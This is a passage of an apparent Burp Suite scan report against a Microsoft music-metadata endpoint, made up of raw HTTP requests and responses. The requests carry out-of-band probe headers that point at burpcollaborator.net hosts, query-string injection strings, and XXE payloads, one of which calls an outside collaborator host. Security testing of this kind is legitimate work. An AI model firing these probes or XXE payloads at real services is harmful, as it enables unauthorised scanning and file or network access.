<mdqRequestID>1F6E8EAC-AD4E-4151-A8A4-183CC7FE0377</mdqRequestID>
<album>
<title>
<text>American Idiot</text>
<word>American</word>
<word>Idiot</word>
</title>
<artist>
<text>Green Day</text>
<word>Green</word>
<word>Day</word>
</artist>
</album>
<track>
<title>
<text>American Idiot</text>
<word>American</word>
<word>zndefined</word>
</title>
<artist>
<text>Green Day</text>
<word>Green</word>
<word>Day</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 American Idiot.m4a</filename>
<trackDuration>176401</trackDuration>
<bitrate>304736</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 2

Request 3

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=1F6E8EAC-AD4E-4151-A8A4-183CC7FE0377&h7be2=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@1ika8any5az37jo3ntkfa7tq5hbm8nwc.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1115
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://wkk5a5pt751y9eqypomac2vl7cdhaayz.burpcollaborator.net/ref
X-Real-IP: spoofed.izlrpr4fmrgko05k4a1wroa7mys3pxdm.burpcollaborator.net
Forwarded: for=spoofed.tqn2g2vqd27vfbwvvls7iz1id9jeg94y.burpcollaborator.net;by=spoofed.tqn2g2vqd27vfbwvvls7iz1id9jeg94y.burpcollaborator.net;host=spoofed.tqn2g2vqd27vfbwvvls7iz1id9jeg94y.burpcollaborator.net
X-Forwarded-For: spoofed.u503v3ars3mwucbwam78x0gjsayfvbj0.burpcollaborator.net
Contact: root@ii4r8rnf5rzk70oknakwaot75yb380wp.burpcollaborator.net
From: root@q7yzxzcnuzosw8dsci94zwifu60bx9ly.burpcollaborator.net
True-Client-IP: spoofed.ujh393or630w8cpwoml8b0uj6acf9ex3.burpcollaborator.net
X-Wap-Profile: http://qlfzbzqn8z2sa8rsqin4dwwf86ebbbz0.burpcollaborator.net/wap.xml
Client-ip: spoofed.uwu3m31rj3dwlc2w1my8o07jjapfmha6.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>1F6E8EAC-AD4E-4151-A8A4-183CC7FE0377</mdqRequestID>
<album>
<title>
<text>American Idiot</text>
<word>American</word>
<word>Idiot</word>
</title>
<artist>
<text>Green Day</text>
<word>Green</word>
<word>Day</word>
</artist>
</album>
<track>
<title>
<text>American Idiot</text>
<word>American</word>
<word>empty</word>
</title>
<artist>
<text>Green Day</text>
<word>Green</word>
<word>Day</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 American Idiot.m4a</filename>
<trackDuration>176401</trackDuration>
<bitrate>304736</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 3

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 04 Sep 2017 01:20:58 GMT
Connection: close

<METADATA><mdqRequestID>1F6E8EAC-AD4E-4151-A8A4-183CC7FE0377</mdqRequestID><ResponseCode>Album Mode</ResponseCode><ResponseCode>Unique Album/Performer Match</ResponseCode><MDR-CD><version>5.0</version><mdqRequestID>1F6E8EAC-AD4E-4151-A8A4-183CC7FE0377</mdqRequestID><WMCollectionID>dee2f966-6f11-4eb9-8fe2-385a92b24890</WMCollectionID><WMCollectionGroupID>dee2f966-6f11-4eb9-8fe2-385a92b24890</WMCollectionGroupID><uniqueFileID>AMGa_id=R 702202</uniqueFileID><albumTitle>American Idiot</albumTitle><albumArtist>Green Day</albumArtist><releaseDate>2004-09-21</releaseDate><label>Reprise</label><genre>Alternative</genre><providerStyle>Pop/Rock</providerStyle><publisherRating>8</publisherRating><buyParams>providerName=AMG&albumID=DEE2F966-6F11-4EB9-8FE2-385A92B24890&a_id=R%20%20%20702202&album=American%20Idiot&artistID=77CF78F7-E149-4FE5-8041-B00019CDA3A3&p_id=P%20%20%20%2069310&artist=Green%20Day</buyParams><largeCoverParams>200/drR500/R539/R53954GKYBC.jpg</largeCoverParams><smallCoverParams>075/drR500/R539/R53954GKYBC.jpg</smallCoverParams><moreInfoParams>a_id=R%20%20%20702202</moreInfoParams><dataProvider>AMG</dataProvider><dataProviderParams>Provider=AMG</dataProviderParams><dataProviderLogo>Provider=AMG</dataProviderLogo><needIDs>0</needIDs><track><WMContentID>c3d13891-e71e-4cff-bf30-47dced919956</WMContentID><trackRequestID>0</trackRequestID><trackTitle>American Idiot</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238555</uniqueFileID><trackNumber>1</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>7e0d49a4-c261-4d38-802d-19e611ae802c</WMContentID><trackRequestID></trackRequestID><trackTitle>Jesus of Suburbia: Jesus of Suburbia/City of the Damned/I Don't Care</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238556</uniqueFileID><trackNumber>2</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>4e84969a-054e-4068-8a25-863636d8eb27</WMContentID><trackRequestID></trackRequestID><trackTitle>Holiday</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238557</uniqueFileID><trackNumber>3</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>fffd5b67-b0d7-4b2c-83f7-2e3f52e2182a</WMContentID><trackRequestID></trackRequestID><trackTitle>Boulevard of Broken Dreams</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238558</uniqueFileID><trackNumber>4</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>f6d6d82b-6f50-433a-8e87-c3033ad6310d</WMContentID><trackRequestID></trackRequestID><trackTitle>Are We the Waiting</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238559</uniqueFileID><trackNumber>5</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>77b792a0-864d-4bec-8b62-3d679106a6bf</WMContentID><trackRequestID></trackRequestID><trackTitle>St. Jimmy</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238560</uniqueFileID><trackNumber>6</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>4197b639-df2d-41d1-997a-d275e8c21375</WMContentID><trackRequestID></trackRequestID><trackTitle>Give Me Novacaine</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238561</uniqueFileID><trackNumber>7</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>4f0309d6-6f83-4a28-87e6-be252d15092a</WMContentID><trackRequestID></trackRequestID><trackTitle>She's a Rebel</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238562</uniqueFileID><trackNumber>8</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>d9760ace-f113-4ee4-89a3-88461b09cd5f</WMContentID><trackRequestID></trackRequestID><trackTitle>Extraordinary Girl</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238563</uniqueFileID><trackNumber>9</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>b65da04f-3c34-4ee4-84f6-75bff2b29942</WMContentID><trackRequestID></trackRequestID><trackTitle>Letter Bomb</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238564</uniqueFileID><trackNumber>10</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>96b2c2f9-342a-4570-ae98-2adde76d72e2</WMContentID><trackRequestID></trackRequestID><trackTitle>Wake Me Up When September Ends</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238565</uniqueFileID><trackNumber>11</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>4c806f03-7e66-4d26-9ece-32e5c3bf9621</WMContentID><trackRequestID></trackRequestID><trackTitle>Homecoming: The Death of St. Jimmy/East 12th St./Nobody Likes You/Rock</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238566</uniqueFileID><trackNumber>12</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day; Mike Dirnt; Tre Cool</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track><track><WMContentID>3836226d-e7da-46da-ba22-636247812c95</WMContentID><trackRequestID></trackRequestID><trackTitle>Whatsername</trackTitle><uniqueFileID>AMGp_id=P 69310;AMGt_id=T 7238567</uniqueFileID><trackNumber>13</trackNumber><trackPerformer>Green Day</trackPerformer><trackComposer>Billie Joe Armstrong; Green Day</trackComposer><trackConductor></trackConductor><period></period><explicitLyrics>1</explicitLyrics></track></MDR-CD><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

Request 4

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=1F6E8EAC-AD4E-4151-A8A4-183CC7FE0377&rnmri2=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@1ika8any5az37jo3ntkfa7tq5hbm8nwc.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1115
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://wkk5a5pt751y9eqypomac2vl7cdhaayz.burpcollaborator.net/ref
X-Real-IP: spoofed.izlrpr4fmrgko05k4a1wroa7mys3pxdm.burpcollaborator.net
Forwarded: for=spoofed.tqn2g2vqd27vfbwvvls7iz1id9jeg94y.burpcollaborator.net;by=spoofed.tqn2g2vqd27vfbwvvls7iz1id9jeg94y.burpcollaborator.net;host=spoofed.tqn2g2vqd27vfbwvvls7iz1id9jeg94y.burpcollaborator.net
X-Forwarded-For: spoofed.u503v3ars3mwucbwam78x0gjsayfvbj0.burpcollaborator.net
Contact: root@ii4r8rnf5rzk70oknakwaot75yb380wp.burpcollaborator.net
From: root@q7yzxzcnuzosw8dsci94zwifu60bx9ly.burpcollaborator.net
True-Client-IP: spoofed.ujh393or630w8cpwoml8b0uj6acf9ex3.burpcollaborator.net
X-Wap-Profile: http://qlfzbzqn8z2sa8rsqin4dwwf86ebbbz0.burpcollaborator.net/wap.xml
Client-ip: spoofed.uwu3m31rj3dwlc2w1my8o07jjapfmha6.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>1F6E8EAC-AD4E-4151-A8A4-183CC7FE0377</mdqRequestID>
<album>
<title>
<text>American Idiot</text>
<word>American</word>
<word>Idiot</word>
</title>
<artist>
<text>Green Day</text>
<word>Green</word>
<word>Day</word>
</artist>
</album>
<track>
<title>
<text>American Idiot</text>
<word>American</word>
<word>zmpty</word>
</title>
<artist>
<text>Green Day</text>
<word>Green</word>
<word>Day</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 American Idiot.m4a</filename>
<trackDuration>176401</trackDuration>
<bitrate>304736</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 4

5.8. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [word XML parameter]
Previous Next

Summary

	Severity:	Medium
	Confidence:	Firm
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Note: This issue was generated by the Burp extension: Backslash Powered Scanner.

Issue detail

Magic value: undefined	undefined	uzdefined
word_count	80	3
whole_body_content	X	Y
content_length	5697	227
limited_body_content	X	Y

Magic value: empty	empty	ezpty
word_count	80	3
whole_body_content	X	Y
content_length	5697	227
limited_body_content	X	Y

Remediation detail

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=D67D6A13-00C5-45E1-AF80-C713DA821D1E&p47ni8zyv23=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@66afwfb3tfn8voc8by8kychvtmzdxiw6l.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1209
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://604fqf53nfh8po685y2kscbvnmtdrii67.burpcollaborator.net/ref
X-Real-IP: spoofed.rfa050ko20wt49ltkjh57xqg278y63yrn.burpcollaborator.net
Forwarded: for=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net;by=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net;host=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net
X-Forwarded-For: spoofed.ct9ljly9glaeiuzey4vqli41gsmjkoec3.burpcollaborator.net
Contact: root@hk5qaqpe7q1j9zqjp9mvcnv67xdobt6hv.burpcollaborator.net
From: root@h3lqtq8eqqkjsz9j895vvne6qxwoutqhf.burpcollaborator.net
True-Client-IP: spoofed.2jmb9boz6b048kp4oulgb8ur6ic9ae72w.burpcollaborator.net
X-Wap-Profile: http://tda232iq02uv2bjvilf75zoi0960452tr.burpcollaborator.net/wap.xml
Client-ip: spoofed.7gog6gl43gx95pm9lzil8drw3n9e7j77w.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>D67D6A13-00C5-45E1-AF80-C713DA821D1E</mdqRequestID>
<album>
<title>
<text>Running On Empty</text>
<word>Running</word>
<word>On</word>
<word>Empty</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
</album>
<track>
<title>
<text>Running On Empty</text>
<word>Running</word>
<word>On</word>
<word>undefined</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 Running On Empty.m4a</filename>
<trackDuration>298097</trackDuration>
<bitrate>263248</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 1

Request 2

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=D67D6A13-00C5-45E1-AF80-C713DA821D1E&mk0lnt0=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@66afwfb3tfn8voc8by8kychvtmzdxiw6l.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1209
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://604fqf53nfh8po685y2kscbvnmtdrii67.burpcollaborator.net/ref
X-Real-IP: spoofed.rfa050ko20wt49ltkjh57xqg278y63yrn.burpcollaborator.net
Forwarded: for=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net;by=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net;host=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net
X-Forwarded-For: spoofed.ct9ljly9glaeiuzey4vqli41gsmjkoec3.burpcollaborator.net
Contact: root@hk5qaqpe7q1j9zqjp9mvcnv67xdobt6hv.burpcollaborator.net
From: root@h3lqtq8eqqkjsz9j895vvne6qxwoutqhf.burpcollaborator.net
True-Client-IP: spoofed.2jmb9boz6b048kp4oulgb8ur6ic9ae72w.burpcollaborator.net
X-Wap-Profile: http://tda232iq02uv2bjvilf75zoi0960452tr.burpcollaborator.net/wap.xml
Client-ip: spoofed.7gog6gl43gx95pm9lzil8drw3n9e7j77w.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>D67D6A13-00C5-45E1-AF80-C713DA821D1E</mdqRequestID>
<album>
<title>
<text>Running On Empty</text>
<word>Running</word>
<word>On</word>
<word>Empty</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
</album>
<track>
<title>
<text>Running On Empty</text>
<word>Running</word>
<word>On</word>
<word>zndefined</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 Running On Empty.m4a</filename>
<trackDuration>298097</trackDuration>
<bitrate>263248</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 2

Request 3

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=D67D6A13-00C5-45E1-AF80-C713DA821D1E&wa1m3vcmhc6=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@66afwfb3tfn8voc8by8kychvtmzdxiw6l.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1205
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://604fqf53nfh8po685y2kscbvnmtdrii67.burpcollaborator.net/ref
X-Real-IP: spoofed.rfa050ko20wt49ltkjh57xqg278y63yrn.burpcollaborator.net
Forwarded: for=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net;by=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net;host=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net
X-Forwarded-For: spoofed.ct9ljly9glaeiuzey4vqli41gsmjkoec3.burpcollaborator.net
Contact: root@hk5qaqpe7q1j9zqjp9mvcnv67xdobt6hv.burpcollaborator.net
From: root@h3lqtq8eqqkjsz9j895vvne6qxwoutqhf.burpcollaborator.net
True-Client-IP: spoofed.2jmb9boz6b048kp4oulgb8ur6ic9ae72w.burpcollaborator.net
X-Wap-Profile: http://tda232iq02uv2bjvilf75zoi0960452tr.burpcollaborator.net/wap.xml
Client-ip: spoofed.7gog6gl43gx95pm9lzil8drw3n9e7j77w.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>D67D6A13-00C5-45E1-AF80-C713DA821D1E</mdqRequestID>
<album>
<title>
<text>Running On Empty</text>
<word>Running</word>
<word>On</word>
<word>Empty</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
</album>
<track>
<title>
<text>Running On Empty</text>
<word>Running</word>
<word>On</word>
<word>empty</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 Running On Empty.m4a</filename>
<trackDuration>298097</trackDuration>
<bitrate>263248</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 3

Request 4

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=D67D6A13-00C5-45E1-AF80-C713DA821D1E&y8htbgvj4t4=1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@66afwfb3tfn8voc8by8kychvtmzdxiw6l.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 1205
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://604fqf53nfh8po685y2kscbvnmtdrii67.burpcollaborator.net/ref
X-Real-IP: spoofed.rfa050ko20wt49ltkjh57xqg278y63yrn.burpcollaborator.net
Forwarded: for=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net;by=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net;host=spoofed.cvblll09ilceku1e04xqni61isojmofc4.burpcollaborator.net
X-Forwarded-For: spoofed.ct9ljly9glaeiuzey4vqli41gsmjkoec3.burpcollaborator.net
Contact: root@hk5qaqpe7q1j9zqjp9mvcnv67xdobt6hv.burpcollaborator.net
From: root@h3lqtq8eqqkjsz9j895vvne6qxwoutqhf.burpcollaborator.net
True-Client-IP: spoofed.2jmb9boz6b048kp4oulgb8ur6ic9ae72w.burpcollaborator.net
X-Wap-Profile: http://tda232iq02uv2bjvilf75zoi0960452tr.burpcollaborator.net/wap.xml
Client-ip: spoofed.7gog6gl43gx95pm9lzil8drw3n9e7j77w.burpcollaborator.net

<METADATA>
<MDQ-CD>
<mdqRequestID>D67D6A13-00C5-45E1-AF80-C713DA821D1E</mdqRequestID>
<album>
<title>
<text>Running On Empty</text>
<word>Running</word>
<word>On</word>
<word>Empty</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
</album>
<track>
<title>
<text>Running On Empty</text>
<word>Running</word>
<word>On</word>
<word>zmpty</word>
</title>
<artist>
<text>Jackson Browne</text>
<word>Jackson</word>
<word>Browne</word>
</artist>
<trackNumber>1</trackNumber>
<filename>01 Running On Empty.m4a</filename>
<trackDuration>298097</trackDuration>
<bitrate>263248</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Response 4

6. Secret input: url
Previous Next

There are 2 instances of this issue:

/cdinfo/getmdrcd.aspx
/cdinfo/getmdrcd.aspx

6.1. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx
Previous Next

Summary

	Severity:	Medium
	Confidence:	Firm
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Note: This issue was generated by a Burp extension.

Issue detail

A unlinked input was identified, based on the following evidence. Response attributes that only stay consistent in one probe-set are italicised, with the variable attribute starred.

Successful probes

Found unlinked param: requestid	requestid	requestidqpfaug
wrtqva	1	0
word_count	15	37
whole_body_content	X	Y
content_length	355	425
initial_body_content	X	Y
limited_body_content	X	Y

Remediation detail

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC&requestid=wrtqvatdzkq6evwc<a`'"${{\&ltqmtwmdc5=1&m0spj3=1 HTTP/1.1
Accept: */*
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 152
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "\\localhost\IPC$" >]>
<foo>&xxe;</foo>

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Dec 2018 19:24:24 GMT
Connection: close

<METADATA><mdqRequestID>CBE2B824-3137-46F9-BB77-34691DDF35AC,wrtqvatdzkq6evwc<a`'"${{\</mdqRequestID><ResponseCode>Error: Query String has a bad format.</ResponseCode><ResponseCode>Guid should contain 32 digits with 4 dashes (xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx).</ResponseCode><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

Request 2

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC&requestidqpfaug=wrtqvarr4bnykhwc<a`'"${{\&k8s6uk8=1&m0gurvrc663=1 HTTP/1.1
Accept: */*
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 152
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "\\localhost\IPC$" >]>
<foo>&xxe;</foo>

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Dec 2018 19:24:24 GMT
Connection: close

<METADATA><mdqRequestID>CBE2B824-3137-46F9-BB77-34691DDF35AC</mdqRequestID><ResponseCode>Error: Parse Error</ResponseCode><ResponseCode>FileStream was asked to open a device that was not a file. For support for devices like 'com1:' or 'lpt1:', call CreateFile, then use the FileStream constructors that take an OS handle as an IntPtr.</ResponseCode><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

6.2. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx
Previous Next

Summary

	Severity:	Medium
	Confidence:	Firm
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Note: This issue was generated by a Burp extension.

Issue detail

Found unlinked param: requestid	requestid	requestidqswyio
wrtqva	1	0
word_count	15	12
whole_body_content	X	Y
content_length	355	281
initial_body_content	X	Y
limited_body_content	X	Y

Remediation detail

Request 1

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC&pqybvgmr5=1&requestid=wrtqvatdzkq6evyi<a`'"${{\&s5me50=1&yu428=1 HTTP/1.1
Accept: */*
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 250
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Connection: close

<?xml version="1.0" encoding="ISO-8859-1" standalone='no'?>
<!DOCTYPE foo [<!ENTITY % lnwi6 SYSTEM "http://9nxbn2ke808b1gjoi0pt6rhorfxbl190xrned22.burpcollaborator.net">%lnwi6; ]>
<!ENTITY xxe SYSTEM "\\localhost\IPC$" >]>
<foo>&xxe;</foo>

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 24 Feb 2019 20:58:55 GMT
Connection: close

